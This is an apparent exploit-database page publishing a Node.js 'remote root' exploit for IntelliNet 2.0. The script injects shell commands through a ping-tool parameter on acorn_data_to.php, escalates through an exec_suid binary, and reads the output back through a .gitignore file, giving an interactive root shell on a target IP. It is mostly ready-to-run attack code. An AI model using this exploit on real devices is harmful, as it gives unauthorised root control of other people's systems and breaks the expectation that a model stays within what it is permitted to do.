IntelliNet 2.0 Remote Root
2024-9-4 05:1:21 Author: cxsecurity.com(查看原文) 阅读量:5 收藏

IntelliNet 2.0 Remote Root

#!/usr/local/bin/node const { execSync } = require('child_process'); const readline = require('readline'); let TARGET = ''; let COMMAND = ''; let SESSION = ''; const ESCALATE = '/usr/aes/bin/exec_suid'; console.log(` ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀ ⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀ ⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀ ⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀ ⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ╔════════════════════════════════════════════╗ ║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║ ║ Author: Jean Pereira <[email protected]> ║ ╚════════════════════════════════════════════╝ `); const cleanUp = () => { execSync( `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"` ); }; const createShell = (cmd) => { execSync( `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent( [ESCALATE, cmd].join(' ') )}%20%3E%20.gitignore;"` ); return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim(); }; const rl = readline.createInterface({ input: process.stdin, output: process.stdout, }); const interactiveShell = () => { rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => { if (currentCommand.trim() === '!q') { console.log('Cleaning up...'); cleanUp(); rl.close(); } else { COMMAND = currentCommand; let output = createShell(COMMAND); console.log(output); interactiveShell(); } }); }; rl.question('[*] Enter target IP: ', (targetIP) => { TARGET = targetIP; SESSION = createShell('echo a1b2c3d4$HOSTNAME'); if (!SESSION.startsWith('a1b2c3d4')) { console.log('[*] Could not execute payload, aborting'); process.exit(0); } else { console.log('[*] Payload injected to firmware'); console.log('[*] Launching root shell via exec_suid'); } console.log(''); interactiveShell(); }); rl.on('close', () => { process.exit(0); });



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024090009
如有侵权请联系:admin#unsafe.sh